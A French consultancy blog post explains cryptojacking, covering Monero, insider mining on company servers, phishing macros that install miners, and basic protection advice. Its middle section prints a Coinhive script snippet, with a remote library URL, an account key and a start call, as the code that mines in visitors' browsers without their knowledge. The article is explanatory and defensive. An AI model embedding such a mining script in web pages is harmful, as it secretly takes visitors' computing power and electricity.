Retour

La nouvelle Cybermenace : le Cryptojacking

L'environnement de travail numérique 12/09/2018 Frédéric Lenquette

Nous allons, dans cet article, nous intéresser aux dernières cyberattaques liées aux crypto-monnaies : le Cryptojacking ou les malwares dédiés au Crypto-mining.

Le développement des crypto-monnaies

Ces derniers mois, la volatilité du Bitcoin et les envolées de son cours dans des valeurs proches des 10.000€ ont attirées les convoitises de toutes parts.

Les unités de crypto-monnaie ne sont pas créées par une banque centrale comme pour l’Euro mais elles sont générées par des ordinateurs dans le monde entier qui résolvent des algorithmes complexes, c’est ce que l’on nomme le minage ou mining.

A ce jour, il est devenu presque impossible de créer du Bitcoin par soi-même avec son PC portable son smartphone ou son ordinateur du bureau. En effet, les calculs sont trop consommateurs en temps et les coûts électriques dépassent donc les revenus anticipés dans la plupart des cas. Plus concrètement : valider les transactions du bitcoin sur un an demande tellement d’énergie que cela représente une consommation d’électricité supérieure à celle d’un pays de la taille de l’Irlande.

On parle beaucoup du Bitcoin mais une autre monnaie virtuelle peut être également trouvée sur le marché : il s’agit de Monero.

Monero est une crypto-monnaie alternative au Bitcoin (une “Altcoin”) qui, contrairement au Bitcoin, apporte de la confidentialité dans les transactions et une totale intraçabilité. La cryptomonnaie a donc rapidement été adoptée pour les transactions du Dark Web, notamment pour le blanchiment d’argent.

De plus Monero utilisent des algorithmes différents du Bitcoin avec lesquels il est encore possible de miner soi-même. De ce fait, Monero a vu son prix passer de $10 en janvier 2017 à plus de $400 début 2018 et a profité de la fluctuation provoquée par l’envolée des cours du Bitcoin.

Cette nouvelle facilité a conduit à une forte augmentation des cyberattaques liées aux crypto-monnaies : le cryptojacking.

Cryptomonnaie

Concrètement, en quoi consiste le cryptojacking ?

Cryptojacker consiste à utiliser l’ordinateur d’un individu ou le serveur d’une entreprise à l’insu de ceux-ci afin de profiter de la puissance de calcul de la machine et de produire de la cryptomonnaie par mining.

Auparavant les cybercriminels réalisaient des malversations grâce à des malwares bancaires ou des fraudes à la carte bancaire, puis revendaient les données récoltées avec celles des ransomewares sur le Darknet. Les techniques ont évoluées avec l’augmentation de la popularité du cryptojacking.

À première vue, l’exploitation des cryptomonnaies ne semble pas être aussi rentable que l’utilisation des ransomewares mais elle peut être secrètement poursuivit pendant des mois sans créer d’impact visible sur la ressource utilisée. Dans la plupart des cas, les outils de sécurité ne détectent pas la présence du crypto-miner installé sur un ordinateur. En effet, ce dernier ne présente pas de menace puisque le seul impact qu’il peut avoir est l’augmentation de la consommation de CPU ou de l’utilisation de la RAM.

Cette malversation peut être utilisée dans les entreprises par certains employés qui installent intentionnellement un logiciel de Minage de Cryptomonnaie sur les serveurs afin de les exploiter à des fins personnelles. L’électricité payée par l’employeur est alors convertie en crypto-monnaie générée par le minage. Les crypto-monnaies les plus exploitées dans ce cas de figure sont l’Etherium et Monero puisqu’elles ne nécessitent pas une grande consommation d’électricité pour être minées.

D’autre part, il est également possible pour les propriétaires de site Web d’utiliser la puissance de calcul des navigateurs de leurs visiteurs afin de produire de minuscule fraction de crypto-monnaie via un programme javascript (Coinhive drive-by mining). Les utilisateurs subissent alors une légère augmentation de leurs ressources informatiques pendant qu’ils naviguent sur le site. Cette technique représente une nouvelle forme de revenu alternatif à la publicité et aux placements de bannières.

Enfin, un webmaster malveillant peut aussi, à l’insu de son employeur, intégrer le script javascript Coinhive et générer du revenu via du minage de Monero par les internautes visitant le site internet.

A quoi ce script ressemble-t-il ?

Voici le code Javascript utilisé pour produire de la Cryptomonnaie à l’insu de l’internaute grâce au navigateur :

<script src=”https://coin-hive.com/lib/coinhive.min.js“>

</script>

<script>

varminer = newCoinHive.Anonymous(‘B4ShXfNHJy3nEDclHBuc5i2bKJ3Sok8P’);

miner.start();

</script>

Le code charge la librairie Javascript de Coinhive, renseigne le compte Monero à utiliser et démarre le mining.

Il existe également des malwares réalisant le Cryptojacking en fonctionnant de manière furtive et pouvant passer inaperçu pendant plusieurs semaines voire des mois. Une infection peut débuter par un mail de phishing avec en pièce jointe un document contenant une macro. Cette macro, une fois exécutée à l’ouverture du document, télécharge et installe le malware à l’insu de l’utilisateur sans que l’antivirus ne le détecte, la signature du malware lui étant inconnue.

Cybersécurité

Comment se protéger du cryptojacking ?

Toute la valeur des crypto-monnaies résident dans leur potentiel de contournement et l’absence de surveillance. Ce type de menace est difficile à détecter car aucun dommage apparent n’est visible et parce que les protections par liste noire d’adresses IP ou par signature des anti-virus ne sont pas toujours efficaces.

Quelques conseils de Scala pour se protéger au mieux :

  • Mettre à jour les antivirus avec les dernières mises à jour des signatures ;
  • Utiliser la dernière version des programmes et des applications ;
  • Vérifier avec le gestionnaire de tache la présence de consommation abusive de ressource CPU ou RAM.
Avatar auteur
Écrit par ,
Consultant Cybersécurité
Ça vous a plu ? Faites tourner !

À lire aussi

Nouveaux usages objets connectes_IOT

Objets connectés : de nouveaux usages qui vont révolutionner l’entreprise, pourquoi pas la vôtre ?

5/02/2018

La solution qui va probablement le plus révolutionner l'entreprise dans les années à venir est celle liée à l'usage des objets connectés. Ceux-ci ne vont pas seulement faire bouger les lignes des usages internes de l'entreprise mais ils vont aussi directement toucher les business models, les modes de production, le rapport aux clients et aux fournisseurs… Comment la révolution des objets connectés va-t-elle s'inscrire en entreprise ? Quel est l'impact de ces nouvelles technologies ?

Je veux lire la suite

say hello !

un projet ? des infos ? un devis ?

on est partout.

Marseille - Siège social
Scala Marseille

11 avenue André Roussin
Immeuble Grand Ecran

13 016 Marseille
+33 (0)4 91 46 84 60
Paris
Scala Paris

8 Rue Euler

75 008 Paris
+33 (0)1 56 68 77 80
Tarascon
Scala Tarascon

18 bis rue Edouard Millaud

13 150 Tarascon
+33 (0)4 91 46 84 60
Tunis – Tunisie
Scala Tunisie

Rue du Lac Biwa, Immeuble Fraj
3ème étage, Lac 1,
Les Berges du Lac

1053 Tunis – Tunisie
+216 71 657 451
Et même Londres, Bruxelles, NY, Montréal et Casablanca.Voir carte.

on recrute !

Venez voir toutes nos offres ici.

contact
le blog